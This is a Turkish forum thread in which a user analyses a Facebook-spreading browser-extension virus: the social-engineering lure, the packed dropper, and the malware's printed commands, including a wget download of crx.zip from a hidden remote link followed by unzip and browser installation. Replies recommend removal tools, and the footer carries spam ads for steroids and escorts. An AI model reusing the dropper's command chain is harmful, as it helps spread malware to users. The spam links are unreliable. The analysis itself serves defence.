WMZİLLA - Full Oyunlar -  Programlar  - Paylaşım Forumu  
Go Back   WMZİLLA - Full Oyunlar - Programlar - Paylaşım Forumu > Sosyal Medya > Facebook
GET sistemi
Hakkimizda Messenger indir GET Platinum Card Etkinlik Takvimi Forum Kurallari Konum Belirleme Lokasyon ve Destek Ofisi

Facebook Facebook hakkında aradığınız herşeyi bulabileceğiniz bölüm.

Sitemize reklam vermek için tıklayın
Yeni Konu aç Cevapla
 
LinkBack Seçenekler Stil
  #1  
Alt 01 Ocak 2014, 15:51
hasan.erol - ait Kullanıcı Resmi (Avatar)
 
istanbul
Üyelik: 01 Aralık 2013
Ticaret Sayısı: (0)
Ticaret Yüzdesi:(%)
Ad-Soyad:
Konular: 404
Mesaj Sayısı:408
Beğeniler: 0 / 0
İlgi Alanı:
Standart Facebook virüsü nasıl temizlenir?

Merhabalar, bu yazımızda son günlerde yayılan tarayıcı virüsünden bahsedeceğim. Bu virüs oldukça iyi yayılmış. Virüsün yaptığı iş çok basit. Tarayıcınıza kendini eklenti olarak ekliyor ve sonucunda sizin Facebook profilinizi yayılmak ve çeşitli amaçlar (beğeni vs..) için kullanıyor. Bu virüsü bulmam ise son günlerde bazı arkadaşlarımın beni yorumlarda taglediğini fark etmem ile oldu. Resimde görüleceği üzere bir arkadaşım yorumda benden bahsetmiş.



Tıkladığımda ” Facebook’taki ruh ikizini bul” gibi bir gönderiye yönlendiriyor. Gönderide bu kesinlikle çalışıyor gibi ibare ve bir link mevcut.



Yorumda görüldüğü üzere kurbanlar bilinçleri dışında arkadaş listelerindeki tüm arkadaşlarını virüs sayesinde burada etiketliyor. Sonuç olarak arkadaşları buraya gelip linke tıkladıklarında resimdeki siteye yönlendiriyor.



Ortada kıytırıktan bir süreç çalışıyor. Sürecin sonunda ne mi oluyor dersiniz? Tabi ki sözde ruh ikizinizi görmeniz için virüsünü indirmenizi istiyor.



Aslında istemiyor da, alttaki resimde görüldüğü gibi çoğu tarayıcıda mousenizi hareket ettirince otomatik olarak indiriyor. Resimdeki yorumlar sizi kandırmasın. Bu sayfa yine resimde göreceğiniz gibi HTTRACK kullanarak bir siteden kopyalanmış. Bu yorumların hepsi aynı sürekli rastgele değişiyor



Evet dosyamızı indirdim.



Anubis’i kullanarak biraz inceleyelim. Alttaki resimde göreceğiniz üzere program paketlenmiş bir virüs. İçerisinde kendisi hariç 3 program daha bulunduruyor. Siz çalıştırdığınız zaman bu programları arşiv mantığıyla arşivden çıkarıyor ve ” install_browser.exe ” programını bilgisayarınızın başlangıcına ekliyor ve çalıştırıyor. Bunun haricinde kendisi işe yaramaz. Tarihten örnek vermek gerekirse Truva Atı mantığıyla çalışıyor. Bunu çalıştırdığınızda içindeki asıl iş yapacak programları ortaya çıkarıyor.



“C:\​Documents and Settings\​Administrator\​Application Data\​install_browser.exe”

Gelelim “install_browser.exe“ programına, bu program sisteminizde aşağıdaki dizinleri oluşturuyor.

C:\Fei
C:\Fei\50470

Ardından işe koyuluyor . Diğer programları (“wget.exe” ve “unzip.exe“) çalıştırıyor. Bu programlar aşağıdaki işlemleri gerçekleştiriyor.

C:\Documents and Settings\Administrator\Application Data\wget.exe
wget.exe -O “C:\Fei\50470\crx.zip” “[Linkleri görebilmeniz için üye girişi yapmalısınız. Eğer üye değilseniz Üye olmak için tıklayınız.]
C:\Documents and Settings\Administrator\Application Data\install_browser.exe
“C:\Documents and Settings\Administrator\Application Data\install_browser.exe” /restart
C:\Documents and Settings\Administrator\Application Data\unzip.exe
unzip.exe -n “C:\Fei\50470\crx.zip” -d “C:\Fei\50470″

Sırayla açıklayayım. İlk olarak “wget.exe” çalışıyor. Bu program sayesinde ikinci satırda bulunan siteden bir arşiv dosyası indiriyor ve adını “crx.zip” olarak değiştiriyor. *** Koymamın sebebi küfür içermesi ).

Son olarak “install_browser.exe” tekrar çalışıp “crx.zip” içindeki eklenti dosyalarını tarayıcınıza ekliyor ve Facebook’unuzu kullanarak kendini yayıyor .

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ChromePref.txt
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\OperaPref.txt
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\YandexPref.txt

Bu virüs antivirüslere yakalanıyor. Size bulaşmaması için ise yapacağınız tek şey; bu tür saçmalıklara inanmamak ve güncel bir antivirüs bulundurmak.

Alıntı ile Cevapla
Sponsored Links
  #2  
Alt 08 Nisan 2014, 01:19
Ersin06 - ait Kullanıcı Resmi (Avatar)  
antalya
Üyelik: 07 Nisan 2014
Ticaret Sayısı: (1)
Ticaret Yüzdesi:(%)
Ad-Soyad:
Konular: 0
Mesaj Sayısı:3
Beğeniler: 0 / 0
İlgi Alanı:
Standart Cevap: Facebook virüsü nasıl temizlenir?

Güzel paylaşım, emeğine sağlık...
Alıntı ile Cevapla
  #3  
Alt 08 Nisan 2014, 01:20
Ersin06 - ait Kullanıcı Resmi (Avatar)  
antalya
Üyelik: 07 Nisan 2014
Ticaret Sayısı: (1)
Ticaret Yüzdesi:(%)
Ad-Soyad:
Konular: 0
Mesaj Sayısı:3
Beğeniler: 0 / 0
İlgi Alanı:
Standart Cevap: Facebook virüsü nasıl temizlenir?

yakalananlar için spyhunter kullanmalarını tavsiye ederim, en ufak kırıntıya kadar bulup yok ediyor....
Alıntı ile Cevapla
Cevapla


Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)
 
Seçenekler
Stil


Tüm Zamanlar GMT +2 Olarak Ayarlanmış. Şuanki Zaman: 18:27.

Forum Hakkımızda
Powered by vBulletin® Version 3.8.6
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd.

© 2014 wmzilla.com | WMZilla Bir Netra iştirakıdır.
09:00 - 20:00 Destek hattı : +31640337288
WMZilla lokasyon ve yazılım ofisi :
Loevesteinlaan 923 2533CC Den haag / Netherlands
WMZilla
DMCA.com Protection Status

Bir irc forum sitesi olan wmzilla.com üzerinde, forum kullanıcıları 5651 sayılı kanun'un ilgili maddesine ve T.C.K'nın 125. maddesine göre yaptıkları paylaşımlardan sorumludur, kullanıcı bazlı herhangi bir durumdan wmzilla.com sorumlu değildir. Tüm hukuksal bildirimlerde bulunmak için abuse@wmzilla.com adresi ile iletişime geçebilirsiniz bu çerçevede, wmzilla.com yönetimi tarafından en geç 7 iş günü içerisinde tarafınıza dönüş yapılacaktır.

instagram beğeni satın al instagram takipçi satın al twitter takipçi satın al mosaic lamp mz parts içerik reseller hosting wordpress hosting ikinci el araba endüstriyel mutfak buy steroids buy steroids usa buy supplements usa fiziksel sunucu sunucu kiralama vps weekly ad epin kurtköy escort denizli escort jigolo pubg mobile uc eta saat